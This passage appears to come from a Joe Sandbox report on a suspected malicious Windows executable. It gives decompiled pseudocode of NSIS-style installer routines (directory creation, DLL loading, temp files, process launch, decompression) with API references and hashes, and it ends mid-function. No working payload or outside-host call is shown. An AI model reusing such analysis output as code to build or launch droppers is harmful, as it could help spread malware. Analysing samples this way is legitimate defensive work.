				_t25 = E00402A0C(0xfffffff0);
				_t10 = E00405882(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405819(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                  0x004015b3
                                                  0x004015ba
                                                  0x004015bd
                                                  0x004015c2
                                                  0x004015c6
                                                  0x004015c8
                                                  0x004015d0
                                                  0x004015d6
                                                  0x004015d8
                                                  0x004015db
                                                  0x004015e3
                                                  0x004015f0
                                                  0x004015fd
                                                  0x004015fd
                                                  0x004015f2
                                                  0x004015f3
                                                  0x004015fb
                                                  0x00000000
                                                  0x00000000
                                                  0x004015fb
                                                  0x004015f0
                                                  0x00401600
                                                  0x00401603
                                                  0x00401605
                                                  0x00401606
                                                  0x004015c8
                                                  0x0040160d
                                                  0x0040162d
                                                  0x0040217a
                                                  0x0040160f
                                                  0x00401611
                                                  0x0040161c
                                                  0x00401622
                                                  0x00401622
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                    • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 3751793516-47812868
                                                  • Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                  • Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
                                                  • Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                  • Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 505 40601d-40603d GetSystemDirectoryA 506 406041-406043 505->506 507 40603f 505->507 508 406053-406055 506->508 509 406045-40604d 506->509 507->506 511 406056-406084 wsprintfA LoadLibraryA 508->511 509->508 510 40604f-406051 509->510 510->511
                                                  C-Code - Quality: 100%
                                                  			E0040601D(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}








                                                  0x00406034
                                                  0x0040603d
                                                  0x0040603f
                                                  0x0040603f
                                                  0x00406043
                                                  0x00406055
                                                  0x0040604f
                                                  0x0040604f
                                                  0x0040604f
                                                  0x00406059
                                                  0x0040606d
                                                  0x0040607d
                                                  0x00406084

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$\
                                                  • API String ID: 2200240437-500877883
                                                  • Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                  • Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
                                                  • Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                  • Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 512 405a01-405a0b 513 405a0c-405a36 GetTickCount GetTempFileNameA 512->513 514 405a45-405a47 513->514 515 405a38-405a3a 513->515 517 405a3f-405a42 514->517 515->513 516 405a3c 515->516 516->517
                                                  C-Code - Quality: 100%
                                                  			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                  0x00405a05
                                                  0x00405a0b
                                                  0x00405a0c
                                                  0x00405a0c
                                                  0x00405a0d
                                                  0x00405a14
                                                  0x00405a1e
                                                  0x00405a2b
                                                  0x00405a2e
                                                  0x00405a36
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a3c
                                                  0x00000000
                                                  0x00405a3c
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405A14
                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-2995086764
                                                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                  • Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
                                                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                  • Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 601 4058cf-4058ea call 405cfb call 405882 606 4058f0-4058fd call 405f5d 601->606 607 4058ec-4058ee 601->607 611 405909-40590b 606->611 612 4058ff-405903 606->612 608 405942-405944 607->608 614 405921-40592a lstrlenA 611->614 612->607 613 405905-405907 612->613 613->607 613->611 615 40592c-405940 call 4057ee GetFileAttributesA 614->615 616 40590d-405914 call 405ff6 614->616 615->608 621 405916-405919 616->621 622 40591b-40591c call 405835 616->622 621->607 621->622 622->614
                                                  C-Code - Quality: 53%
                                                  			E004058CF(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CFB(0x421988, _a4);
				_t21 = E00405882(0x421988);
				if(_t21 != 0) {
					E00405F5D(_t21);
					if(( *0x423f98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421988;
						while(1) {
							_t11 = lstrlenA(0x421988);
							_push(0x421988);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FF6();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405835(0x421988);
								continue;
							} else {
								goto L1;
							}
						}
						E004057EE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                  0x004058db
                                                  0x004058e6
                                                  0x004058ea
                                                  0x004058f1
                                                  0x004058fd
                                                  0x00405909
                                                  0x00405909
                                                  0x00405921
                                                  0x00405922
                                                  0x00405929
                                                  0x0040592a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040590d
                                                  0x00405914
                                                  0x0040591c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405914
                                                  0x0040592c
                                                  0x00405932
                                                  0x00000000
                                                  0x00405940
                                                  0x004058ff
                                                  0x00405903
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405903
                                                  0x004058ec
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                    • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                  • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405922
                                                  • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405932
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\
                                                  • API String ID: 3248276644-3404278061
                                                  • Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                  • Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
                                                  • Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                  • Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 624 40555b-405588 CreateProcessA 625 405596-405597 624->625 626 40558a-405593 CloseHandle 624->626 626->625
                                                  C-Code - Quality: 100%
                                                  			E0040555B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422588->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                  0x00405564
                                                  0x00405580
                                                  0x00405588
                                                  0x0040558d
                                                  0x00000000
                                                  0x00405593
                                                  0x00405597

                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                  • CloseHandle.KERNEL32(?), ref: 0040558D
                                                  Strings
                                                  • Error launching installer, xrefs: 0040556E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                  • Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
                                                  • Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                  • Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 631 406768-40676e 632 406770-406772 631->632 633 406773-406a71 631->633 632->633 635 406a9b-406a9f 633->635 636 406aa1-406ac2 635->636 637 406aff-406b12 635->637 638 406ac4-406ad9 636->638 639 406adb-406aee 636->639 640 406a1b-406a21 637->640 642 406af1-406af8 638->642 639->642 645 4061c6 640->645 646 406bce 640->646 643 406a98 642->643 644 406afa 642->644 643->635 655 406a7d-406a95 644->655 656 406baf 644->656 647 406272-406276 645->647 648 4062e2-4062e6 645->648 649 4061cd-4061d1 645->649 650 40630d-4069b4 645->650 651 406bd1-406bd5 646->651 660 406b22-406b2c 647->660 661 40627c-406295 647->661 657 406b31-406b3b 648->657 658 4062ec-406300 648->658 653 4061d7-4061e4 649->653 654 406bb9-406bcc 649->654 664 4069b6-4069cc 650->664 665 4069ce-4069e4 650->665 653->646 662 4061ea-406230 653->662 654->651 655->643 656->654 657->654 663 406303-40630b 658->663 660->654 666 406298-40629c 661->666 667 406232-406236 662->667 668 406258-40625a 662->668 663->648 663->650 669 4069e7-4069ee 664->669 665->669 666->647 670 40629e-4062a4 666->670 671 406241-40624f GlobalAlloc 667->671 672 406238-40623b GlobalFree 667->672 673 406268-406270 668->673 674 40625c-406266 668->674 675 4069f0-4069f4 669->675 676 406a15 669->676 677 4062a6-4062ad 670->677 678 4062ce-4062e0 670->678 671->646 679 406255 671->679 672->671 673->666 674->673 674->674 680 406ba3-406bad 675->680 681 4069fa-406a12 675->681 676->640 682 4062b8-4062c8 GlobalAlloc 677->682 683 4062af-4062b2 GlobalFree 677->683 678->663 679->668 680->654 681->676 682->646 682->678 683->682
                                                  C-Code - Quality: 99%
                                                  			E00406768() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
